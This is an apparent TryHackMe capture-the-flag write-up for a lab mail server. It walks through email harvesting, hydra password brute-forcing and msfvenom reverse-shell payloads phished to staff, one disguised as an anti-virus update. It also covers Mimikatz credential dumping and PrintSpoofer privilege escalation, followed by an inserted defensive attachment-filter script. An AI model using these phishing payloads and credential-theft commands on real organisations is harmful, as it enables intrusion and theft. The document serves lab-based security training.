You Got Mail | Try Hack Me | Pentest Style Report on a CTF

Room: tryhackme.com/room/yougotmail

Objective:

To perform a security assessment for Brik and test the susceptibility of employees to phishing attacks.

Scope:

Active assessments on <Machine_IP> 10.10.157.197
Passive reconnaissance on:
brownbrick.co

Reconnaissance:

We start with an Nmap scan. (For CTFs I always like to do an all-port scan first and then run a service-version and default-script scan on the open ports.)
nmap -p- 10.10.157.197 -vvv
There are a lot of ports open.

Now we enumerate the open ports with -sVC (service version detection plus the default Nmap scripts).

nmap -p 25,110,135,139,143,445,587,3389,5985,47001,49664,49665,49666,49667,49668,49669,49671,49672 -sVC 10.10.157.197
Starting Nmap 7.93 ( https://nmap.org ) at 2025-02-11 05:38 UTC
Nmap scan report for ip-10-10-157-197.eu-west-1.compute.internal (10.10.157.197)
Host is up (0.00043s latency).
PORT STATE SERVICE VERSION
25/tcp open smtp hMailServer smtpd
| smtp-commands: BRICK-MAIL, SIZE 20480000, AUTH LOGIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
110/tcp open pop3 hMailServer pop3d
|_pop3-capabilities: USER TOP UIDL
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
143/tcp open imap hMailServer imapd
|_imap-capabilities: CHILDREN RIGHTS=texkA0001 NAMESPACE IMAP4rev1 SORT completed CAPABILITY QUOTA OK IDLE IMAP4 ACL
445/tcp open microsoft-ds?
587/tcp open smtp hMailServer smtpd
| smtp-commands: BRICK-MAIL, SIZE 20480000, AUTH LOGIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
3389/tcp open ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2025-02-11T05:39:48+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=BRICK-MAIL
| Not valid before: 2025-02-10T05:10:02
|_Not valid after: 2025-08-12T05:10:02
| rdp-ntlm-info:
| Target_Name: BRICK-MAIL
| NetBIOS_Domain_Name: BRICK-MAIL
| NetBIOS_Computer_Name: BRICK-MAIL
| DNS_Domain_Name: BRICK-MAIL
| DNS_Computer_Name: BRICK-MAIL
| Product_Version: 10.0.17763
|_ System_Time: 2025-02-11T05:39:43+00:00
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49671/tcp open msrpc Microsoft Windows RPC
49672/tcp closed unknown
MAC Address: 02:19:9D:B1:01:83 (Unknown)
Service Info: Host: BRICK-MAIL; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_nbstat: NetBIOS name: BRICK-MAIL, NetBIOS user: <unknown>, NetBIOS MAC: 02199db10183 (unknown)
| smb2-time:
| date: 2025-02-11T05:39:43
|_ start_date: N/A
| smb2-security-mode:
| 311:
|_ Message signing enabled but not required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 60.53 seconds

The target system is running Windows & has multiple email-related ports open, including SMTP (25, 587), POP3 (110), and IMAP (143), indicating the presence of an hMailServer email service.

BrownBrick:

Now let's enumerate the brownbrick.co website to see what we can find.
There is not much on the website, but the "Our Team" page lists potential users and their email addresses:
brownbrick.co/menu.html

We make a list of the email addresses shown there (saved as emails.txt):

oaurelius@brownbrick.co
tchikondi@brownbrick.co
wrohit@brownbrick.co
pcathrine@brownbrick.co
lhedvig@brownbrick.co
fstamatis@brownbrick.co


We have seen that SMTP is served by hMailServer, and we now have email addresses that potentially use that service. So let's try to brute-force the password for any of the above addresses.

hydra -L emails.txt -P /usr/share/wordlists/rockyou.txt 10.10.157.197 smtp

There is potentially an easier way: generate a wordlist from brownbrick.co using CeWL.

cewl https://brownbrick.co > pass.txt


I also like to generate a lowercase version of the list just in case, and then combine both lists for the brute force.

cewl --lowercase https://brownbrick.co > pass_lower.txt


Then combine both:

cat pass.txt pass_lower.txt > passwords.txt

Now run hydra against the combined list:

hydra -L emails.txt -P passwords.txt 10.10.157.197 smtp

We get a password for one email address. (rockyou.txt could also have given us this password, but it would have taken a lot of time.)

Phishing:

As we have an email address and its password for hMailServer, we can use Thunderbird to log in and send malicious mails to the other users, or we can simply do that with a bash script. But first we need a payload that gives us a reverse shell if any user opens or installs it.
There are various ways to do this, like a malicious VBA macro in a .doc or .xls file, or directly generating a reverse shell executable with msfvenom. I will try an .xls file here to simulate a realistic phishing attack.
First generate a reverse shell VBA script with msfvenom:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.50.89.229 LPORT=443 -f vba


Copy the generated script into a macro of a new "sales_report.xls" file.
(Again, you don't need a Meterpreter shell; any Windows reverse shell works, in which case you listen with netcat.)
If you went with the Meterpreter payload, start msfconsole and run multi/handler after setting the payload, LHOST and LPORT. If you used a non-Meterpreter payload, simply start a netcat listener.

Now, to send the mails, we can use a bash one-liner:

for email in $(cat emails.txt); do sendemail -f "lhedvig@brownbrick.co" -t $email -u "Sales Report" -m "Please check the report is correct or needs to be updated." -a sales_report.xls -s 10.10.157.197:25 -xu "lhedvig@brownbrick.co" -xp "bricks"; done


Explanation:

for email in $(cat emails.txt); do ... done

Reads each email address from emails.txt and assigns it to the variable $email. Iterates over each email and executes the sendemail command for it.

sendemail

A command-line tool used to send emails via SMTP.

-f "lhedvig@brownbrick.co"

The sender's email address

-t $email

The recipient's email address (To field). This changes for each loop iteration.

-u "Sales Report"

Subject of the mail.

-m "Please check the report is correct or needs to be updated."

Body of the mail.

-a sales_report.xls

Our malicious attachment

-s 10.10.157.197:25

SMTP server (host:port).

-xu "lhedvig@brownbrick.co" -xp "bricks";

SMTP username and password used to authenticate to the server.

But I didn't get a shell, which means the VBA macro payload wasn't executed (macros have to be enabled by the user), so we have to try a simpler direct payload:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.89.229 LPORT=443 -f exe -o update.exe

for email in $(cat emails.txt); do sendemail -f "lhedvig@brownbrick.co" -t $email -u "Sales Report" -m "Install the latest version of anti-virus to protect your system" -a update.exe -s 10.10.157.197:25 -xu "lhedvig@brownbrick.co" -xp "bricks"; done


And we get a reverse shell as wrohit.
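The two mails above, a macro-bearing .xls and then a bare .exe sent from an authenticated internal account, are exactly what a mail gateway filter should stop before a user ever sees them. As an added example that is not part of the original post, the Python below inspects the attachments of a message built in the same shape the sendemail loop produces; the blocklists, verdict labels and the constructed payload bytes are assumptions for illustration.

```python
import email
import os
from email import policy
from email.message import EmailMessage

# Policy tables for this example (assumptions, not hMailServer settings):
# direct executables are blocked outright; legacy Office formats that can
# carry VBA macros are quarantined for review rather than delivered.
BLOCKED_EXTENSIONS = {".exe", ".scr", ".bat", ".cmd", ".ps1", ".vbs", ".js", ".hta", ".msi"}
MACRO_CAPABLE = {".xls", ".xlsm", ".xlam", ".doc", ".docm", ".dotm"}


def build_message(sender, recipient, subject, body, filename, payload):
    """Construct a message shaped like the ones the sendemail loop produces.
    Used here only as test input; payload bytes are constructed, not real."""
    msg = EmailMessage()
    msg["From"] = sender
    msg["To"] = recipient
    msg["Subject"] = subject
    msg.set_content(body)
    msg.add_attachment(payload, maintype="application",
                       subtype="octet-stream", filename=filename)
    return msg.as_bytes()


def classify_attachments(raw):
    """Return (filename, verdict) for every attachment in a raw RFC 5322 message.
    The content check (PE 'MZ' header) catches an .exe renamed to a harmless
    extension, which a filename-only rule would miss."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    findings = []
    for part in msg.iter_attachments():
        name = part.get_filename() or ""
        ext = os.path.splitext(name.lower())[1]
        data = part.get_payload(decode=True) or b""
        if ext in BLOCKED_EXTENSIONS or data.startswith(b"MZ"):
            findings.append((name, "block: executable"))
        elif ext in MACRO_CAPABLE:
            findings.append((name, "quarantine: macro-capable document"))
        else:
            findings.append((name, "allow"))
    return findings


def gateway_verdict(raw):
    """Collapse per-attachment findings into one delivery decision."""
    verdicts = [v for _, v in classify_attachments(raw)]
    if any(v.startswith("block") for v in verdicts):
        return "block"
    if any(v.startswith("quarantine") for v in verdicts):
        return "quarantine"
    return "deliver"
```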

Now get the user flag by navigating to the Desktop.

Let's enumerate a few things:

The wrohit user is in the Administrators group, so we don't need to do a priv-esc (we will still do it at the end).
Now, to answer the second question, we can use Mimikatz to get the password.
We already have a Meterpreter shell, so we can just load the kiwi extension (Mimikatz). If we had a shell via netcat, we could simply upload Mimikatz to the target and get the hash or even the clear-text password.

But this needs SYSTEM privileges, so kiwi didn't give any results; I therefore uploaded Mimikatz to the target and ran:

sekurlsa::wdigest

We get wrohit's password.
Now, to answer the final question, we have to navigate to
C:\Program Files (x86)\hMailServer\Bin\hMailServer.ini
as this is the file where hMailServer stores its credentials.

(The official hMailServer website also documents this, but for some reason the website wasn't loading, so I had to ask ChatGPT.)
Open the file with "type hMailServer.INI" and we get the password hash.

To crack the password we can simply use CrackStation (as this is a CTF and not a real target).

We get the password and the room is complete!



Priv-esc:

Although not required for this room, I still escalate our privileges.
By checking "whoami /priv" we see we have "SeImpersonatePrivilege".

We can use PrintSpoofer

GitHub - itm4n/PrintSpoofer: Abusing impersonation privileges through the "Printer Bug"

to priv-esc to Administrator. We just have to upload it to the target and run it.

And we have the highest privileges on a Windows system: "nt authority\system".
Thank you for reading :)


My linkedin:
https://www.linkedin.com/in/imshadab18